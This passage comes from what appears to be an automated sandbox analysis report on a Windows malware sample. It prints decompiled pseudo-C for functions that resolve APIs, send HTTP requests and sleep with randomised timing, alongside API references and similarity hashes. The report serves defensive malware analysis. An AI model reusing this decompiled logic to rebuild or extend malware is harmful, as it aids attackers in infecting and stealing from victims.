									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401210
0x00401214
0x004012d5
0x0040121a
0x00401232
0x00401241
0x00401248
0x0040124a
0x0040124f
0x004012cd
0x004012ce
0x00401251
0x0040125e
0x00401260
0x00401265
0x00000000
0x00401267
0x00401274
0x00401276
0x0040127b
0x00000000
0x0040127d
0x0040128a
0x0040128c
0x00401291
0x00000000
0x00401293
0x004012a0
0x004012a2
0x004012a7
0x00000000
0x004012a9
0x004012af
0x004012b5
0x004012ba
0x004012bf
0x004012c4
0x00000000
0x004012c6
0x004012c9
0x004012c9
0x004012c4
0x004012a7
0x00401291
0x0040127b
0x00401265
0x0040124f
0x004012e3

APIs

Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
GetProcAddress.KERNEL32(00000000,?), ref: 00401248
GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
GetProcAddress.KERNEL32(00000000,?), ref: 00401274
GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
GetProcAddress.KERNEL32(00000000,?), ref: 004012A0

Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
Part of subcall function 0040110B: memset.NTDLL ref: 0040118A

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68

Uniqueness

Uniqueness Score: -1.00%

Function 02BD51D8 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02BD51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02BD2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02BD7B83(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02bd51d8
0x02bd51e5
0x02bd51e7
0x02bd524a
0x00000000
0x02bd524a
0x02bd51ff
0x02bd5206
0x02bd5212
0x02bd5217
0x02bd522d
0x02bd523d
0x00000000
0x02bd522f
0x02bd522f
0x02bd5236
0x02bd5243
0x02bd5243
0x02bd5243
0x02bd5236
0x02bd522d
0x02bd5248
0x00000000
0x00000000
0x02bd524e

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02BD21E7,?,?,747581D0,00000000), ref: 02BD5212
ResetEvent.KERNEL32(?), ref: 02BD5217
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02BD5224
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02BD3F34,00000000,?,?), ref: 02BD522F
GetLastError.KERNEL32(?,?,00000102,02BD21E7,?,?,747581D0,00000000), ref: 02BD524A

Part of subcall function 02BD2058: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?,?,747581D0), ref: 02BD2064
Part of subcall function 02BD2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?), ref: 02BD20C2
Part of subcall function 02BD2058: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD20D2

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02BD3F34,00000000,?), ref: 02BD523D

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: a5a58009fae3a44d71a502ae43173bce06b03bbaa9ba6dcd25a8539619cd79e8
Instruction ID: d7a76eb94bf21ac04e45ec984e5175a2a00a41195871c86c813415edf2409f62
Opcode Fuzzy Hash: a5a58009fae3a44d71a502ae43173bce06b03bbaa9ba6dcd25a8539619cd79e8
Instruction Fuzzy Hash: A0016D31101602ABD7306B61EC44FDBBBA9FF593A4F900A65F591D20E0F720E858DB20

Uniqueness

Uniqueness Score: -1.00%

Function 02BD2523 Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E02BD2523(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02BD4520();
				if(_t21 != 0) {
					_t60 =  *0x2bda2fc; // 0x2000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x2bda2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2bda178(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02BD3037( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x2bda348; // 0x9dd5a8
					if( *0x2bda2fc > 5) {
						_t8 = _t26 + 0x2bdb51d; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2bdb9db; // 0x44283a44
						_t27 = _t7;
					}
					E02BD4332(_t27, _t27);
					_t31 = E02BD415A(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E02BD27A0();
						 *0x2bda310 =  *0x2bda310 ^ 0x81bbe65d;
						 *0x2bda36c = _t32;
						_t33 = E02BD33DC(0x60);
						 *0x2bda3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x2bda3cc; // 0x35b9600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x2bda3cc; // 0x35b9600
							 *_t52 = 0x2bdb142;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x2bda2d8, 0, 0x43);
							 *0x2bda368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x2bda2fc; // 0x2000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x2bda348; // 0x9dd5a8
								_t13 = _t59 + 0x2bdb74a; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x2bd927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02BD3BD3( ~_v8 &  *0x2bda310, 0x2bda00c); // executed
								_t55 = E02BD1D8A(0, _t56, _t62, _t64, 0x2bda00c);
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E02BD6EA3(_t62);
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E02BD6815(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E02BD5C31(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2bda17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E02BD23C4(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}

0x02bd2523
0x02bd252d
0x02bd2530
0x02bd2533
0x02bd2536
0x02bd253d
0x02bd253f
0x02bd254b
0x02bd254d
0x02bd254d
0x02bd2556
0x02bd255c
0x02bd2561
0x02bd257b
0x02bd2587
0x02bd2589
0x02bd258e
0x02bd2598
0x02bd2598
0x02bd2590
0x02bd2590
0x02bd2590
0x02bd2590
0x02bd259f
0x02bd25ac
0x02bd25b3
0x02bd25b8
0x02bd25b8
0x02bd25c1
0x02bd25c4
0x02bd25ea
0x02bd25ef
0x02bd25fb
0x02bd2600
0x02bd2605
0x02bd260a
0x02bd260c
0x02bd2638
0x02bd263a
0x02bd260e
0x02bd2612
0x02bd2617
0x02bd261c
0x02bd2623
0x02bd2629
0x02bd262e
0x02bd2634
0x02bd263b
0x02bd263d
0x02bd263f
0x02bd264e
0x02bd2654
0x02bd2659
0x02bd265b
0x02bd268b
0x02bd268d
0x02bd265d
0x02bd265d
0x02bd2663
0x02bd2670
0x02bd2676
0x02bd2676
0x02bd267e
0x02bd2687
0x02bd268e
0x02bd2690
0x02bd2692
0x02bd2699
0x02bd26a6
0x02bd26b0
0x02bd26b2
0x02bd26b4
0x00000000
0x00000000
0x02bd26b6
0x02bd26bb
0x02bd26bd
0x02bd26c4
0x02bd26c8
0x02bd26cb
0x02bd26e0
0x02bd26e4
0x02bd26e9
0x00000000
0x02bd26e9
0x02bd26cd
0x02bd26cf
0x00000000
0x00000000
0x02bd26da
0x02bd26dc
0x02bd26de
0x00000000
0x00000000
0x00000000
0x02bd26de
0x02bd26c1
0x02bd26c1
0x02bd2692
0x02bd25c6
0x02bd25c6
0x02bd25cb
0x02bd26eb
0x02bd26f0
0x02bd26f8
0x02bd26f8
0x00000000
0x02bd26f0
0x02bd25d1
0x02bd25d4
0x02bd25de
0x02bd25e5
0x00000000
0x02bd2700
0x02bd2700
0x02bd2703
0x02bd2707
0x02bd2707

APIs

Part of subcall function 02BD4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,02BD253B,00000001), ref: 02BD452F

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02BD25B8

Part of subcall function 02BD27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 02BD27C4
Part of subcall function 02BD27A0: wsprintfA.USER32 ref: 02BD2828

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

memset.NTDLL ref: 02BD2612
RtlInitializeCriticalSection.NTDLL(035B95C0), ref: 02BD2623

Part of subcall function 02BD5C31: memset.NTDLL ref: 02BD5C4B
Part of subcall function 02BD5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02BD5C91
Part of subcall function 02BD5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02BD5C9C

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02BD264E
wsprintfA.USER32 ref: 02BD267E

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: bdc7ccbe3433294f938863022eb368e80c7ff422e0d854e57b630d8dc34fc355
Instruction ID: 5c1f42ae1e5a5bf40cae456cb5ca2cedae0e34a8e272a09a1a620ad9dfcd9b90
Opcode Fuzzy Hash: bdc7ccbe3433294f938863022eb368e80c7ff422e0d854e57b630d8dc34fc355
Instruction Fuzzy Hash: 18514571E82354ABDB20ABA4DCA4FEE37B8FB04754F0488E5E901E7182F77099408F50

Uniqueness

Uniqueness Score: -1.00%

Function 00401DE1 Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x404160 = _t1;
				if(_t1 != 0) {
					 *0x404170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004019F1(); // executed
					_t6 = _t4;
					HeapDestroy( *0x404160);
				}
				ExitProcess(_t6);
			}

0x00401de2
0x00401deb
0x00401df1
0x00401df8
0x00401e01
0x00401e06
0x00401e0c
0x00401e17
0x00401e19
0x00401e19
0x00401e20

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401DEB
GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
GetCommandLineW.KERNEL32 ref: 00401E06

Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
Part of subcall function 004019F1: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
Part of subcall function 004019F1: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD

HeapDestroy.KERNEL32 ref: 00401E19
ExitProcess.KERNEL32 ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
String ID:
API String ID: 1863574965-0
Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5251 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD5251(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02BD6ADC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2bda348; // 0x9dd5a8
				_t4 = _t24 + 0x2bdbc70; // 0x35b9218
				_t5 = _t24 + 0x2bdbb60; // 0x4f0053
				_t26 = E02BD33F1( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2bda348; // 0x9dd5a8
						_t11 = _t32 + 0x2bdbcc8; // 0x35b9270
						_t48 = _t11;
						_t12 = _t32 + 0x2bdbb60; // 0x4f0053
						_t52 = E02BD5DE4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2bda348; // 0x9dd5a8
							_t13 = _t35 + 0x2bdbcf0; // 0x30314549
							_t37 = E02BD5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x2bda2fc - 6;
								if( *0x2bda2fc <= 6) {
									_t42 =  *0x2bda348; // 0x9dd5a8
									_t15 = _t42 + 0x2bdbcd2; // 0x52384549
									E02BD5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2bda348; // 0x9dd5a8
							_t17 = _t38 + 0x2bdbbb8; // 0x35b9160
							_t18 = _t38 + 0x2bdbc1c; // 0x680043
							_t45 = E02BD5B0E(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2bda2d8, 0, _t52);
						}
					}
					HeapFree( *0x2bda2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02BD7220(_t54);
				}
				return _t45;
			}

0x02bd5251
0x02bd5261
0x02bd5264
0x02bd526b
0x02bd526d
0x02bd526d
0x02bd5270
0x02bd5275
0x02bd527c
0x02bd5289
0x02bd528e
0x02bd5292
0x02bd52a0
0x02bd52ae
0x02bd52b2
0x02bd5343
0x02bd5343
0x02bd52b8
0x02bd52b8
0x02bd52bd
0x02bd52bd
0x02bd52c4
0x02bd52d0
0x02bd52d2
0x02bd52d4
0x02bd52d6
0x02bd52dd
0x02bd52e8
0x02bd52ef
0x02bd52f1
0x02bd52f8
0x02bd52fa
0x02bd5301
0x02bd530c
0x02bd530c
0x02bd52f8
0x02bd5311
0x02bd5316
0x02bd531d
0x02bd533b
0x02bd533d
0x02bd533d
0x02bd52d4
0x02bd534f
0x02bd534f
0x02bd5351
0x02bd5356
0x02bd5358
0x02bd5358
0x02bd5363

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,035B9218,00000000,?,7476F710,00000000,7476F730), ref: 02BD52A0
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,035B9160,?,00000000,30314549,00000014,004F0053,035B9270), ref: 02BD533D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD68B6), ref: 02BD534F

Strings

Uqt, xrefs: 02BD52A6

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 6698f6ea7520c4a9a6aa749dcdef7b02c303878c150521f2fa27aeba55045ca5
Instruction ID: 447b6d3a025cd40f4f9e9b0550f6bcb37fd966e12b7f3df1f8b1ce3c5bc85d72
Opcode Fuzzy Hash: 6698f6ea7520c4a9a6aa749dcdef7b02c303878c150521f2fa27aeba55045ca5
Instruction Fuzzy Hash: 9931DF31901209BFCB20DB91DC84EDE3BBDEB04754F5640A9E501AB160FBB19A54DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4358 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02BD43B5
SysAllocString.OLEAUT32(02BD4D42), ref: 02BD43F9
SysFreeString.OLEAUT32(00000000), ref: 02BD440D
SysFreeString.OLEAUT32(00000000), ref: 02BD441B

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: e165a60a82a389e901214fae263ab319957ea08edd53db270dc71f4341659f77
Instruction ID: 8931b978915f34dd9874c32a03bf34993fa9208fe42fc47638254e6e580ea041
Opcode Fuzzy Hash: e165a60a82a389e901214fae263ab319957ea08edd53db270dc71f4341659f77
Instruction Fuzzy Hash: C6312C76900209AFCB00CF98D4D09EE7BB9FF08354B15846EF906D7250EB70A681CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02BD213E Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E02BD213E(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L02BD8436();
					_t34 = _t16 + _t13;
					_t17 = E02BD6269(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x02bd2143
0x02bd214e
0x02bd214f
0x02bd214f
0x02bd215b
0x02bd2164
0x02bd2167
0x02bd216b
0x02bd216d
0x02bd2172
0x02bd2173
0x02bd2174
0x02bd217e
0x02bd2181
0x02bd2188
0x02bd218c
0x02bd2193
0x02bd2199
0x02bd21a3

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,02BD5044,?,?), ref: 02BD214F
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02BD5044,?,?), ref: 02BD215B
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02BD2174

Part of subcall function 02BD6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02BD6308

Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02BD5044,?,?), ref: 02BD2193

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: 49c55abeaf28c2259e47edf5ed7712cc26528df9a93d591098c6cb3e50e7d1f6
Instruction ID: 9063cd8135808dc51f9630d59c100195a6e5fcdd531db28b9b2c6f9f60b5bb0f
Opcode Fuzzy Hash: 49c55abeaf28c2259e47edf5ed7712cc26528df9a93d591098c6cb3e50e7d1f6
Instruction Fuzzy Hash: 46F0A477B406047BD7149AA4DC19BDF76B9DB843A1F540564E601E7340F6B49A018A90

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD5157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E02BD6536(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E02BD330E(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t21 = E02BD7767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
						_t22 = _t21;
					}
					HeapFree( *0x2bda2d8, 0, _t25);
				}
				return _t22;
			}

0x02bd5157
0x02bd5168
0x02bd516c
0x02bd51c7
0x02bd516e
0x02bd5175
0x02bd517d
0x02bd5185
0x02bd5189
0x02bd518f
0x02bd5197
0x02bd519a
0x02bd51ad
0x02bd51b2
0x02bd51b2
0x02bd51bd
0x02bd51bd
0x02bd51ce

APIs

Part of subcall function 02BD6536: lstrlen.KERNEL32(?,00000000,035B9E40,00000000,02BD6F0A,035BA063,43175AC3,?,?,?,?,43175AC3,00000005,02BDA00C,4D283A53,?), ref: 02BD653D
Part of subcall function 02BD6536: mbstowcs.NTDLL ref: 02BD6566
Part of subcall function 02BD6536: memset.NTDLL ref: 02BD6578

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,035B9270), ref: 02BD518F
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,035B9270), ref: 02BD51BD

Strings

Uqt, xrefs: 02BD51BD

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uqt
API String ID: 1500278894-2320327147
Opcode ID: 25d5068065cc0ecb20ba138d8633dc5517f28ccb9814c44a76246ec1b7578b1a
Instruction ID: 2e0495214699ecd55f79da1ef0e3808296c7b808767ee9d516e606e81aaf3d78
Opcode Fuzzy Hash: 25d5068065cc0ecb20ba138d8633dc5517f28ccb9814c44a76246ec1b7578b1a
